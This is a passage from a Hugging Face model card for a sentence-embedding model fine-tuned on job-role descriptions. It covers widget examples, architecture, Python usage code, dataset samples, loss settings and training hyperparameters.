and product development, providing expert guidance in resolving customer technical
challenges. Additionally, the incumbent mentors junior team members, evaluates
team performance, and ensures alignment with organizational targets. Leading a
laboratory team, the Senior Application Chemist works closely with Research and
Development, sales, and marketing departments, demonstrating strong problem-solving
capabilities, effective multitasking, and proficient communication skills in technical
documentation and presentations.
- source_sentence: The Technician (Assembly) performs assembly tasks for aircraft
components in accordance with technical manuals and standard operating procedures
(SOPs). He/She operates workshop equipment, tools and machines for the assembly
of aircraft components. He also keeps abreast of latest developments of related
systems by updating himself through relevant manuals and other publications. He
may be authorised by the organisation to perform quality control functions, including
inspection of incoming materials and assembled components and parts, and registration
of non-conformances. He may also be authorised to perform level 1 non-destructive
testing (NDT) functions under supervision, evaluate for acceptance or rejection,
and record results as specified in the work instructions. He complies with airworthiness
and legislative requirements, and the organisation's safety, health and quality
systems. He supports in implementation of continuous improvement initiatives and
lean practices. He works in a hangar or workshop and may be required to work in
shifts. He should be systematic and detail-oriented, and able to work independently
and in a team to accomplish assigned tasks.
sentences:
- The Technician (Assembly) is responsible for assembling aircraft parts following
detailed technical manuals and established standard operating procedures. This
role involves the operation of various workshop machinery, tools, and equipment
to ensure precise assembly of aircraft components. The Technician stays updated
on the latest system advancements by reviewing relevant technical literature and
manuals. Authorized by the company, the Technician may conduct quality assurance
activities, including inspecting incoming materials and assembled parts, as well
as documenting any non-conformities. Additionally, the Technician may perform
supervised level 1 non-destructive testing (NDT), assessing components for compliance
and accurately recording results in line with work instructions. Compliance with
aviation safety standards, airworthiness regulations, and internal quality and
health protocols is essential. The Technician actively participates in continuous
improvement and lean methodology initiatives. Work is typically carried out in
a workshop or hangar environment, often involving shift work. The ideal candidate
is meticulous, organized, and capable of working autonomously or collaboratively
to complete assigned duties.
- The Assistant Stage Manager supports the Stage Manager throughout all phases of
production, including pre-production planning, rehearsals, live performances,
and post-production tasks. Responsibilities include attending production meetings,
facilitating communication among creative and technical teams, coordinating rehearsal
schedules, preparing and maintaining production documentation, and managing onstage
operations during rehearsals and shows as directed. They may also handle the procurement
and organization of props and costumes, and for extended runs, they might take
on show calling duties or serve as an alternate show caller to ensure seamless
performances.
- The Technician (Assembly) specializes in the repair and maintenance of automotive
engines, utilizing diagnostic tools and automotive repair equipment to troubleshoot
and fix mechanical issues. This role requires familiarity with vehicle service
manuals and adherence to road safety regulations and environmental standards.
The Technician performs routine inspections, identifies faulty parts, and carries
out component replacements to ensure optimal vehicle performance. Responsibilities
include maintaining detailed service records and collaborating with service advisors
to provide customers with accurate repair timelines. Work is conducted primarily
in an automotive workshop, with occasional overtime during peak periods. Strong
problem-solving skills, a customer-focused attitude, and the ability to work independently
or as part of a team are essential for success in this position.
- source_sentence: The Senior Infant Educator plays an active role as a mentor to
the Infant Educator team. He/She takes responsibility for coaching and leading
the infant care team in the Centre. He plays an important role in the design and
implementation of developmentally appropriate curricula and programmes for the
day-to-day developmental and caregiving tasks for infants. He also leads the building
of relationships and partnerships with stakeholders. He designs and implements
family and community programmes, and contributes to the Centres culture of continuous
learning, collaboration and collegiality, in line with its vision, mission and
goals.
sentences:
- The Associate Applications Support Engineer is tasked with maintaining and supporting
key software applications, whether developed internally or sourced from third
parties. This role requires comprehensive knowledge of application functionalities
and backend systems. The engineer collaborates closely with development, transition,
and testing teams to troubleshoot, document, and resolve application issues. Working
within a team environment, the engineer utilizes proficiency in application development
and monitoring tools aligned with organizational standards. Familiarity with the
software platforms hosting the solutions is essential. The role demands strong
analytical abilities, a problem-solving mindset, and excellent communication skills
to effectively address technical challenges.
- The Senior Toddler Educator leads the toddler care team by developing and managing
programmes focused on early childhood literacy and motor skills development. This
role emphasizes coordinating group activities and managing classroom logistics,
while maintaining compliance with childcare regulations specific to toddlers.
The Senior Toddler Educator also oversees staff scheduling and administrative
reporting, working closely with centre management to ensure operational efficiency.
- The Senior Infant Educator serves as a key mentor and leader within the Infant
Educator team, guiding and supporting staff in delivering high-quality infant
care. This role involves overseeing the creation and execution of age-appropriate
curricula and daily caregiving activities tailored to infants’ developmental needs.
Additionally, the Senior Infant Educator fosters strong collaborations with families
and community partners, designs family engagement initiatives, and promotes a
culture of ongoing learning and teamwork aligned with the Centre’s core values
and objectives.
- source_sentence: The Senior Manufacturing Planning Executive formulates production
plans and organises materials, manpower and resources to accomplish manufacturing
functions to fulfil customer and financial commitments. He/She validates the master
production schedule (MPS) and drives adherence of manufacturing works to project
schedules and goals in collaboration with cross-functional leads. He leads material
requirements planning and programme reviews with relevant stakeholders. He is
responsible for optimising supply chain and logistics planning, contract negotiations,
vendor sourcing, inventory planning and control and warehousing operations to
meet manufacturing requirements. He leverages data from supply chain management
(SCM) systems to enhance decision-making and implements supplier capability development
plans to enhance performance. He drives continuous improvements on product on-time
delivery and total available man-hours, develops strategies and priorities for
critical customer issues, facilitates problem-solving, leads in regular reviews
with customers and suppliers, and establishes best practices on process improvements
to enhance productivity. He proactively contributes to the development of lean
and sustainability practices, and conducts research and digital innovation in
targeted areas for continuous process improvements. As a team leader, he appraises
staff performance and conducts coaching and mentoring for planning personnel.
He should possess advanced statistical, forecasting and analytical skills to predict
planning and resource requirements. He is able to drive cross-functional collaboration
between internal and external stakeholders to optimise the planning processes
and ensure maximum resource utilisation.
sentences:
- The Senior Manufacturing Planning Executive develops and implements production
schedules while coordinating materials, workforce, and resources to meet manufacturing
targets aligned with customer demands and financial objectives. This role involves
validating the master production schedule and ensuring manufacturing activities
comply with project timelines through collaboration with various departments.
The executive leads material planning and program assessments with key partners
and is accountable for optimizing supply chain logistics, managing contracts,
sourcing vendors, controlling inventory, and overseeing warehouse operations to
support manufacturing needs. By utilizing supply chain management data, the executive
enhances decision-making and drives supplier capability improvements. They champion
continuous improvements in on-time delivery performance and labor efficiency,
formulate strategies to address critical customer concerns, facilitate problem
resolution, conduct stakeholder reviews, and promote best practices to boost productivity.
Additionally, the role supports lean methodologies and sustainability initiatives,
explores digital innovations, and leads process enhancements. As a leader, the
executive evaluates team performance and provides coaching and mentoring to planning
staff. The position demands strong statistical, forecasting, and analytical expertise
to anticipate planning and resource demands and fosters effective collaboration
among internal and external partners to maximize planning efficiencies.
- The Supervisor (Passenger Services) oversees daily passenger service operations
to ensure compliance with established service quality benchmarks. Collaborating
closely with multiple departments, this role addresses intricate customer concerns
and conducts routine safety and security inspections to uphold a secure workplace.
Serving as a mentor, the Supervisor guides team members and handles conflict resolution,
grievances, and disputes within the team. A comprehensive knowledge of airport
and airline check-in protocols, as well as baggage handling system procedures,
is essential. Operating in shifts to support continuous flight schedules, the
Supervisor acts as a representative for the company’s service standards. The role
demands strong communication, interpersonal, customer service, and leadership
abilities, with an aptitude for working effectively in a diverse, multicultural
environment.
- The Senior Procurement Executive manages the acquisition of goods and services,
negotiates supplier contracts, and oversees vendor relationships to support the
company’s purchasing needs. This role focuses on sourcing strategies, supplier
evaluations, cost analysis, and procurement compliance within the manufacturing
industry. The executive leads procurement planning, coordinates with finance and
operations teams, and ensures timely delivery of purchased materials. They are
responsible for maintaining supplier performance metrics, conducting market research,
and implementing procurement best practices. The role requires strong negotiation
skills, supplier risk management, and contract administration experience. As a
senior professional, the executive supervises procurement staff and drives continuous
improvement initiatives in sourcing processes.
datasets:
- dnth/ssf-train-valid-v4.2
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on nomic-ai/modernbert-embed-base
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [nomic-ai/modernbert-embed-base](https://huggingface.co/nomic-ai/modernbert-embed-base) on the [ssf-train-valid-v4.2](https://huggingface.co/datasets/dnth/ssf-train-valid-v4.2) dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [nomic-ai/modernbert-embed-base](https://huggingface.co/nomic-ai/modernbert-embed-base) <!-- at revision d556a88e332558790b210f7bdbe87da2fa94a8d8 -->
- **Maximum Sequence Length:** 8192 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
- **Training Dataset:**
- [ssf-train-valid-v4.2](https://huggingface.co/datasets/dnth/ssf-train-valid-v4.2)
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 8192, 'do_lower_case': False, 'architecture': 'ModernBertModel'})
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
(2): Normalize()
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("dnth/ssf-retriever-modernbert-embed-base-v4.2")
# Run inference
sentences = [
'The Senior Manufacturing Planning Executive formulates production plans and organises materials, manpower and resources to accomplish manufacturing functions to fulfil customer and financial commitments. He/She validates the master production schedule (MPS) and drives adherence of manufacturing works to project schedules and goals in collaboration with cross-functional leads. He leads material requirements planning and programme reviews with relevant stakeholders. He is responsible for optimising supply chain and logistics planning, contract negotiations, vendor sourcing, inventory planning and control and warehousing operations to meet manufacturing requirements. He leverages data from supply chain management (SCM) systems to enhance decision-making and implements supplier capability development plans to enhance performance. He drives continuous improvements on product on-time delivery and total available man-hours, develops strategies and priorities for critical customer issues, facilitates problem-solving, leads in regular reviews with customers and suppliers, and establishes best practices on process improvements to enhance productivity. He proactively contributes to the development of lean and sustainability practices, and conducts research and digital innovation in targeted areas for continuous process improvements. As a team leader, he appraises staff performance and conducts coaching and mentoring for planning personnel. He should possess advanced statistical, forecasting and analytical skills to predict planning and resource requirements. He is able to drive cross-functional collaboration between internal and external stakeholders to optimise the planning processes and ensure maximum resource utilisation.',
'The Senior Manufacturing Planning Executive develops and implements production schedules while coordinating materials, workforce, and resources to meet manufacturing targets aligned with customer demands and financial objectives. This role involves validating the master production schedule and ensuring manufacturing activities comply with project timelines through collaboration with various departments. The executive leads material planning and program assessments with key partners and is accountable for optimizing supply chain logistics, managing contracts, sourcing vendors, controlling inventory, and overseeing warehouse operations to support manufacturing needs. By utilizing supply chain management data, the executive enhances decision-making and drives supplier capability improvements. They champion continuous improvements in on-time delivery performance and labor efficiency, formulate strategies to address critical customer concerns, facilitate problem resolution, conduct stakeholder reviews, and promote best practices to boost productivity. Additionally, the role supports lean methodologies and sustainability initiatives, explores digital innovations, and leads process enhancements. As a leader, the executive evaluates team performance and provides coaching and mentoring to planning staff. The position demands strong statistical, forecasting, and analytical expertise to anticipate planning and resource demands and fosters effective collaboration among internal and external partners to maximize planning efficiencies.',
'The Senior Procurement Executive manages the acquisition of goods and services, negotiates supplier contracts, and oversees vendor relationships to support the company’s purchasing needs. This role focuses on sourcing strategies, supplier evaluations, cost analysis, and procurement compliance within the manufacturing industry. The executive leads procurement planning, coordinates with finance and operations teams, and ensures timely delivery of purchased materials. They are responsible for maintaining supplier performance metrics, conducting market research, and implementing procurement best practices. The role requires strong negotiation skills, supplier risk management, and contract administration experience. As a senior professional, the executive supervises procurement staff and drives continuous improvement initiatives in sourcing processes.',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[1.0000, 0.9240, 0.5197],
# [0.9240, 1.0000, 0.5085],
# [0.5197, 0.5085, 1.0000]])
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### ssf-train-valid-v4.2
* Dataset: [ssf-train-valid-v4.2](https://huggingface.co/datasets/dnth/ssf-train-valid-v4.2) at [97c8b4d](https://huggingface.co/datasets/dnth/ssf-train-valid-v4.2/tree/97c8b4d3dc96a480e369838fb9f00464ce9080e9)
* Size: 7,540 training samples
* Columns: <code>anchor</code>, <code>positive</code>, and <code>negative</code>
* Approximate statistics based on the first 1000 samples:
| | anchor | positive | negative |
|:--------|:-------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 58 tokens</li><li>mean: 167.85 tokens</li><li>max: 355 tokens</li></ul> | <ul><li>min: 58 tokens</li><li>mean: 138.3 tokens</li><li>max: 293 tokens</li></ul> | <ul><li>min: 50 tokens</li><li>mean: 108.71 tokens</li><li>max: 249 tokens</li></ul> |
* Samples:
| anchor | positive | negative |
|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>The Manufacturing Engineer/Production Engineer (Assembly) develops detailed operation and specification sheets throughout the assembly cycle. He/She coordinates shop floor operations and process control, and plans resources to meet production targets. He is conversant with tools and fixtures design and computer integrated manufacturing (CIM) technologies. He determines appropriate resources and processes for engineering application while ensuring working conditions of assembly equipment and machinery. He also manages assembly techniques and verifies conformance of new aircraft components and parts to specifications. He ensures adherence of assembly operations to legislative and airworthiness requirements, as well as with the organisation's standard operating procedures (SOPs), safety, health and quality systems. He identifies opportunities for continuous improvement through data analytics, research and innovation, and implements lean and sustainability practices in assembly. He monitor...</code> | <code>The Manufacturing Engineer (Assembly) is responsible for creating detailed operation and specification documentation for the assembly process. This role involves coordinating shop floor activities and overseeing process controls while managing resource planning to achieve production goals. The engineer applies expertise in tooling and fixture design alongside computer integrated manufacturing (CIM) technologies to determine suitable resources and processes for engineering tasks. Ensuring optimal working conditions for assembly machinery and equipment, the engineer supervises assembly methods and confirms that new aircraft parts meet stringent specification requirements. Compliance with legislative, airworthiness, and organizational standard operating procedures (SOPs), as well as health, safety, and quality management systems, is rigorously maintained. The role focuses on identifying and implementing continuous improvement initiatives through data analysis, innovation, and lean manufac...</code> | <code>The Manufacturing Engineer (Quality Assurance) oversees the inspection and testing of finished products to ensure compliance with quality standards. This role manages quality control procedures throughout the production cycle but does not directly engage in assembly or shop floor coordination. The engineer utilises statistical process control and quality management systems to monitor product conformity, focusing on defect reduction and customer satisfaction. Responsibilities include conducting audits, documenting non-conformance issues, and recommending corrective actions aligned with regulatory requirements and internal policies. While familiar with manufacturing tools and technologies, this position emphasizes quality assurance processes rather than resource planning or tooling design. The engineer collaborates with cross-functional teams to improve product reliability and supports training initiatives on quality standards. Strong analytical skills and attention to detail are necessa...</code> |
| <code>The Linen Room Attendant/Laundry Valet Attendant performs daily assigned duties to support the day-to-day laundry, linen and uniform room operations, ensuring the delivery of clean garments, uniforms, towels and linens to all internal and external customers. He/She collects and delivers guest laundry, performs laundry cleaning, sorts and issues linens and uniforms, and assists in inventory count. He also cleans and maintains laundry equipment and the work area. As part of service delivery, the Linen Room Attendant/Laundry Valet Attendant has to handle guests' requests and respond to their concerns and feedback in a professional and courteous manner. He complies with organisational guidelines and regulations on hygiene and workplace safety and health, and reports safety hazards observed to ensure workplace safety and security. He is a team player with a high level of attentiveness to details and good communication skills to interact with guests and all levels of staff. He works on shift...</code> | <code>The Linen Room Attendant/Laundry Valet Attendant is responsible for supporting daily operations in the laundry, linen, and uniform rooms by ensuring prompt and efficient delivery of cleaned garments, towels, uniforms, and linens to both internal departments and external guests. This role involves collecting and returning guest laundry, sorting and distributing linens and uniforms, conducting inventory checks, and maintaining cleanliness of laundry equipment and workspaces. The attendant addresses guest inquiries and concerns professionally and courteously, adheres to hygiene and workplace safety standards, and promptly reports any safety issues. This position requires teamwork, attention to detail, effective communication skills, and physical stamina to handle tasks such as standing, walking, and lifting heavy laundry loads throughout shifts that may include weekends and public holidays.</code> | <code>The Linen Room Supervisor oversees the strategic planning and management of laundry services within a hotel, leading a team of attendants and coordinating with multiple departments to optimize operational efficiency. This senior role involves budgeting, staff training, and implementing quality control measures rather than performing hands-on laundry tasks. The supervisor is responsible for developing service standards, managing vendor relationships, and ensuring compliance with corporate policies, with minimal direct involvement in daily linen sorting or equipment maintenance. Strong leadership, decision-making capabilities, and experience in workforce management are essential, while physical demands are limited compared to frontline laundry roles.</code> |
| <code>The General Worker / Operator performs general duties, and cleaning and housekeeping tasks as assigned. He/She is required to assist in operating machinery under supervision and moving aircraft components, equipment and materials from the store to respective work areas. He is expected to adhere to the organisation's standard operating procedures (SOPs), and safety, health and quality systems. He supports in implementation of continuous improvement initiatives to ensure workspace efficiency and effectiveness. He works in a hangar or workshop and may be required to work in shifts. He should be comfortable with repetitive work activities and exposure to physically demanding work conditions such as long standing hours and extreme temperatures.</code> | <code>The General Worker / Operator is responsible for carrying out various general tasks including cleaning and housekeeping duties as directed. This role involves assisting with machinery operation under guidance and transporting aircraft parts, equipment, and supplies from storage to designated work areas. The incumbent must strictly follow the company’s standard operating procedures, along with safety, health, and quality protocols. They contribute to continuous improvement efforts aimed at enhancing workspace productivity and efficiency. The position is based in a hangar or workshop environment and may require shift work. The ideal candidate should be able to handle repetitive tasks and endure physically challenging conditions such as prolonged standing and exposure to temperature extremes.</code> | <code>The Warehouse Clerk manages inventory records and coordinates the receipt and dispatch of goods within the logistics sector. This role requires proficiency in inventory management software and strong organizational skills to maintain stock accuracy. The Warehouse Clerk operates in a distribution center and collaborates closely with supply chain teams to ensure timely delivery schedules. The position demands attention to detail and the ability to work under pressure but does not involve machinery operation or physically strenuous activities common in manufacturing environments.</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"gather_across_devices": false
}
```
### Evaluation Dataset
#### ssf-train-valid-v4.2
* Dataset: [ssf-train-valid-v4.2](https://huggingface.co/datasets/dnth/ssf-train-valid-v4.2) at [97c8b4d](https://huggingface.co/datasets/dnth/ssf-train-valid-v4.2/tree/97c8b4d3dc96a480e369838fb9f00464ce9080e9)
* Size: 1,885 evaluation samples
* Columns: <code>anchor</code>, <code>positive</code>, and <code>negative</code>
* Approximate statistics based on the first 1000 samples:
| | anchor | positive | negative |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 60 tokens</li><li>mean: 170.26 tokens</li><li>max: 403 tokens</li></ul> | <ul><li>min: 59 tokens</li><li>mean: 138.72 tokens</li><li>max: 265 tokens</li></ul> | <ul><li>min: 50 tokens</li><li>mean: 109.98 tokens</li><li>max: 252 tokens</li></ul> |
* Samples:
| anchor | positive | negative |
|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>The Technician (Signal and Communications) works in a team to perform preventive and corrective maintenance of signal, communication and control systems, to improve the reliability of signal, communication and control systems. He/She assists in the preparation of maintenance activities and is technically inclined and adept in handling electronics and computer-based systems and equipment for maintenance. He also supervises the work of contractors and external stakeholders in ensuring adherence to operating requirements and safety standards. He may be required to perform shift duties at various rail premises such as workshops, depots, train stations, and train tunnels. He is capable of communicating effectively within the team, is able to multi-task and can prioritises his assigned maintenance workload in supporting maintenance activities.</code> | <code>The Technician (Signal and Communications) collaborates within a team to conduct routine and emergency maintenance on signal, communication, and control infrastructures, aiming to enhance system reliability. This role involves assisting in the planning of maintenance operations and requires strong technical skills in electronics and computer-based maintenance tools. The technician oversees contractors and external partners to ensure compliance with operational protocols and safety guidelines. Shift work at various rail facilities, including workshops, depots, stations, and tunnels, may be necessary. Effective team communication, multitasking abilities, and prioritization of maintenance tasks are essential to support ongoing maintenance efforts.</code> | <code>The Technician (Electrical Installations) is responsible for installing and testing electrical wiring and equipment in residential and commercial buildings. They prepare site layouts, follow electrical codes, and ensure safety during installation processes. The technician coordinates with suppliers and clients but does not engage in signal or communication system maintenance. Shift work is generally not required, and the role focuses on hands-on installation rather than supervising external contractors. Strong knowledge of electrical wiring, circuit breakers, and household electrical standards is necessary, along with good communication skills to liaise with homeowners and site managers.</code> |
| <code>The Visual Merchandiser manages shopper marketing activities and is responsible for the conceptualisation of the visual merchandising plans. He/she oversees the set-up of merchandise display by coaching in-store teams. He is also responsible for market research efforts relating to visual merchandising. He operates in a fast-paced and creative environment where he conceptualises eye-catching product displays, store layouts and designs to promote the store's products. He is creative, detail-oriented and is effective working within tight deadlines. He is able to effectively prioritise multiple assignments and possesses an aesthetic flair.</code> | <code>The Visual Merchandiser is responsible for planning and executing shopper marketing strategies through innovative visual displays. This role involves guiding retail teams in arranging merchandise presentations and ensuring the store environment is appealing and aligned with brand standards. The Visual Merchandiser conducts market research to stay updated on trends and consumer preferences, working in a dynamic, fast-paced setting that demands creativity and precision. Strong organizational skills and an eye for design are essential to manage multiple projects and deliver compelling store layouts that enhance customer engagement.</code> | <code>The Visual Merchandiser leads the digital marketing campaigns for retail brands, focusing on online shopper engagement and social media promotions. He/she develops content strategies, coordinates with creative teams, and analyses ecommerce data to optimise product visibility. Operating in a technology-driven environment, the Visual Merchandiser applies analytical skills and marketing knowledge to influence buying behaviour through digital channels rather than physical displays. This role requires proficiency in digital tools and a strong understanding of consumer analytics rather than traditional visual merchandising techniques.</code> |
| <code>The Network Development Technician implements gas transmission and/or distribution network development projects and monitors site activities. He/She supports the preparation of construction activity records, project progress reports and materials required for payments. He also liaises with contractors and customers to carry out metering works and performs the installation, testing and commissioning of residential meters. He applies Safe System of Work (SSoW) procedures and risk control measures to ensure work activities are carried out safely, and in compliance with Workplace Safety and Health (WSH) Act. He is a member of the Emergency Response Team and follows emergency response plans and relevant safety procedures. He occasionally works at construction sites for the gas transmission and/or distribution network development projects. He is a good team player who collaborates and communicates effectively with key stakeholders. He is detailed in ensuring that operations are carried out a...</code> | <code>The Network Development Technician is responsible for executing gas transmission and distribution network expansion initiatives while overseeing on-site operations. This role involves assisting in the documentation of construction activities, compiling project status updates, and coordinating materials for billing purposes. The technician interacts with contractors and clients to facilitate metering installations, including the testing and commissioning of residential gas meters. Adherence to Safe System of Work protocols and risk mitigation strategies is essential to maintain compliance with the Workplace Safety and Health Act. As an integral member of the Emergency Response Team, the technician follows prescribed emergency procedures and safety guidelines. Fieldwork at construction locations is periodically required. Strong teamwork, clear communication with stakeholders, and meticulous attention to procedural compliance are key attributes for success in this role.</code> | <code>The Network Operations Coordinator oversees the scheduling and administration of telecommunications network services, ensuring seamless connectivity and customer satisfaction. This position requires coordinating with service providers and vendors to manage infrastructure upgrades and maintenance tasks. The coordinator prepares operational reports and assists with billing reconciliations. Familiarity with IT systems and network management software is essential, alongside strong communication skills to liaise with internal teams and external partners. While safety protocols are observed, the role primarily focuses on service delivery rather than physical installation or emergency response activities. The coordinator works mainly in an office environment and supports multiple projects simultaneously without direct involvement in gas transmission or distribution networks.</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"gather_across_devices": false
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `eval_strategy`: epoch
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 32
- `gradient_accumulation_steps`: 32
- `learning_rate`: 2e-05
- `weight_decay`: 0.01
- `num_train_epochs`: 5
- `lr_scheduler_type`: cosine
- `warmup_ratio`: 0.1
- `bf16`: True
- `tf32`: True
- `load_best_model_at_end`: True
- `gradient_checkpointing`: True
- `batch_sampler`: no_duplicates
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: epoch
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 32
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 32
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 2e-05
- `weight_decay`: 0.01
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 5
- `max_steps`: -1
- `lr_scheduler_type`: cosine
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: True
- `fp16`: False
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: True
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: True
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: True
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: no_duplicates
- `multi_dataset_batch_sampler`: proportional
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
### Training Logs
| Epoch | Step | Training Loss | Validation Loss |
|:-------:|:------:|:-------------:|:---------------:|
